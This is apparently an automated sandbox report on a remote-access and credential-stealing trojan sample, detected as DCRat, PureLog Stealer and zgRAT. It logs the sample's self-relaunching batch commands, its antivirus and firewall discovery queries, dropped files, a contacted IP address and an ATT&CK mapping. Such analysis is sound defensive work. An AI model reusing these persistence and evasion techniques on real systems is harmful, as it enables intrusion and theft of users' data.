                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\teh76E2k50.exeQueries volume information: C:\Users\user\Desktop\teh76E2k50.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\teh76E2k50.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2777547098.000000001BF30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2515147316.000000001BA46000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2512547472.000000001B5B0000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2668501857.000000001B78D000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2667164126.000000001B44D000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2872187878.000000001BB1D000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2868866041.000000001B832000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2972062578.000000001B0F2000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3322655099.000000001BCB7000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3345697219.000000001C023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: teh76E2k50.exe PID: 5772, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe PID: 4072, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: teh76E2k50.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.teh76E2k50.exe.8f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\sihost.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: teh76E2k50.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.teh76E2k50.exe.8f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\sihost.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: teh76E2k50.exe PID: 5772, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe PID: 4072, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: teh76E2k50.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.teh76E2k50.exe.8f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\sihost.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: teh76E2k50.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.teh76E2k50.exe.8f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\sihost.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts141
                            Windows Management Instrumentation                            		1
                            Scripting                            		11
                            Process Injection                            		33
                            Masquerading                            		OS Credential Dumping251
                            Security Software Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            Registry Run Keys / Startup Folder                            		1
                            Registry Run Keys / Startup Folder                            		1
                            Disable or Modify Tools                            		LSASS Memory1
                            Process Discovery                            		Remote Desktop ProtocolData from Removable Media2
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		151
                            Virtualization/Sandbox Evasion                            		Security Account Manager151
                            Virtualization/Sandbox Evasion                            		SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                            Process Injection                            		NTDS1
                            Remote System Discovery                            		Distributed Component Object ModelInput Capture12
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information                            		LSA Secrets1
                            System Network Configuration Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                            Obfuscated Files or Information                            		Cached Domain Credentials2
                            File and Directory Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Software Packing                            		DCSync34
                            System Information Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1547568 Sample: teh76E2k50.exe Startdate: 02/11/2024 Architecture: WINDOWS Score: 100 112 Suricata IDS alerts for network traffic 2->112 114 Antivirus detection for dropped file 2->114 116 Antivirus / Scanner detection for submitted sample 2->116 118 11 other signatures 2->118 14 teh76E2k50.exe 4 49 2->14         started        process3 file4 98 C:\Windows\SchCache\sihost.exe, PE32 14->98 dropped 100 C:\Users\user\Desktop\xATktOEY.log, PE32 14->100 dropped 102 C:\Users\user\Desktop\sMBlRSok.log, PE32 14->102 dropped 104 34 other malicious files 14->104 dropped 17 cmd.exe 1 14->17         started        process5 signatures6 108 Uses ping.exe to sleep 17->108 110 Uses ping.exe to check the status of other devices and networks 17->110 20 wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe 14 34 17->20         started        24 conhost.exe 17->24         started        26 PING.EXE 1 17->26         started        28 chcp.com 1 17->28         started        process7 dnsIp8 106 194.135.20.4, 49829, 49909, 49968 ASBAXETNRU Russian Federation 20->106 74 C:\Users\user\Desktop\yimcMvrd.log, PE32 20->74 dropped 76 C:\Users\user\Desktop\wnjMVvNo.log, PE32 20->76 dropped 78 C:\Users\user\Desktop\wfzurMmi.log, PE32 20->78 dropped 80 26 other malicious files 20->80 dropped 30 cmd.exe 1 20->30         started        file9 process10 signatures11 120 Uses ping.exe to sleep 30->120 33 wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe 33 30->33         started        36 conhost.exe 30->36         started        38 PING.EXE 1 30->38         started        40 chcp.com 1 30->40         started        process12 file13 66 C:\Users\user\Desktop\zLWUHZHy.log, PE32 33->66 dropped 68 C:\Users\user\Desktop\vVgeAcHF.log, PE32 33->68 dropped 70 C:\Users\user\Desktop\tlovySpD.log, PE32 33->70 dropped 72 26 other malicious files 33->72 dropped 42 cmd.exe 33->42         started        process14 process15 44 wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe 42->44         started        47 conhost.exe 42->47         started        49 chcp.com 42->49         started        51 w32tm.exe 42->51         started        file16 90 C:\Users\user\Desktop\trTNZned.log, PE32 44->90 dropped 92 C:\Users\user\Desktop\sJafoJXg.log, PE32 44->92 dropped 94 C:\Users\user\Desktop\nNYOgdhm.log, PE32 44->94 dropped 96 26 other malicious files 44->96 dropped 53 cmd.exe 44->53         started        process17 process18 55 wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe 53->55         started        58 conhost.exe 53->58         started        60 chcp.com 53->60         started        62 w32tm.exe 53->62         started        file19 82 C:\Users\user\Desktop\zYgEJQlz.log, PE32 55->82 dropped 84 C:\Users\user\Desktop\wWhDskZv.log, PE32 55->84 dropped 86 C:\Users\user\Desktop\vZGvXkKA.log, PE32 55->86 dropped 88 26 other malicious files 55->88 dropped 64 cmd.exe 55->64         started        process20

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            teh76E2k50.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
